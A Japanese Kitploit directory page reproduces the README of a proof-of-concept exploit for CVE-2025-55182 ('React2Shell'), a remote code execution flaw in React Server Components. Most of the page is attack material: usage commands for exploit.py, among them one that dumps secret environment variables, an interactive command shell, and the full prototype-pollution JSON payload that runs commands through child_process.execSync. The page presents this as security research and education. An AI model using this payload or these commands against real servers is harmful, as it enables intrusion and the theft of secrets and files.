Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ツール/GitHubGitHub/joaovicdev/exploit-cve-2025-55182
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育レッドチーミングペイロード開発
GitHubjoaovicdev/exploit-cve-2025-55182

EXPLOIT-CVE-2025-55182

CVE-2025-55182 (React2Shell) の概念実証エクスプロイト。React Server Components のプロトタイプ汚染による重大な RCE 脆弱性です。対話型およびコマンドラインのエクスプロイトモードを含みます。

リポジトリを見る
5ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2025-55182 概念実証

CVE-2025-55182 React

概要

CVE-2025-55182 (React2Shell) の実践的なデモンストレーション - React Server Components における重大な RCE 脆弱性です。

脆弱性の詳細

  • CVE ID: CVE-2025-55182
  • タイプ: プロトタイプ汚染によるリモートコード実行
  • CVSS: 9.8 (緊急)
  • 影響を受けるバージョン: React 19.0.0, 19.1.0, 19.1.1, 19.2.0

攻撃ベクトル

React Server Components は FormData を安全でない方法で逆シリアライズします。特別に細工されたマルチパートフィールドはプロトタイプ汚染を引き起こし、child_process.execSync を介して任意のコードを実行します。


クイックセットアップ

root@kitploit:~
npm install
pip3 install requests
npm run dev

アプリケーションは http://localhost:3000 で実行されます。


悪用

基本的な使い方

root@kitploit:~
python3 exploit.py -c "whoami"

コマンド例

root@kitploit:~
python3 exploit.py -c "whoami"
python3 exploit.py -c "pwd"
python3 exploit.py -c "ls -la"
python3 exploit.py -c "cat package.json"
python3 exploit.py -c "env | grep SECRET"

対話モード

root@kitploit:~
python3 exploit.py -i
root@kitploit:~
> whoami
COMMAND RESULT:
your-username
============================================================

> pwd
COMMAND RESULT:
/path/to/project
============================================================

> exit

動作の仕組み

ペイロード構造

root@kitploit:~
{
  "then": "$1:__proto__:then",
  "status": "resolved_model",
  "reason": -1,
  "value": "{\"then\":\"$B1337\"}",
  "_response": {
    "_prefix": "var res=process.mainModule.require('child_process').execSync('CMD',{'timeout':5000}).toString().trim();;throw Object.assign(new Error('NEXT_REDIRECT'), {digest:`${res}`});",
    "_chunks": "$Q2",
    "_formData": {"get": "$1:constructor:constructor"}
  }
}

テスト

ターミナル 1: サーバーを起動

root@kitploit:~
npm run dev

ターミナル 2: エクスプロイトを実行

root@kitploit:~
python3 exploit.py -c "whoami"

詳細モード

root@kitploit:~
python3 exploit.py -c "whoami" -v

完全なペイロード構造とサーバーレスポンスを表示します


参考情報

  • CVE-2025-55182 - NVD
  • React セキュリティ
  • OWASP デシリアライゼーション

Guaxinim 作 | サイバーセキュリティ研究<!--

ツールをダウンロード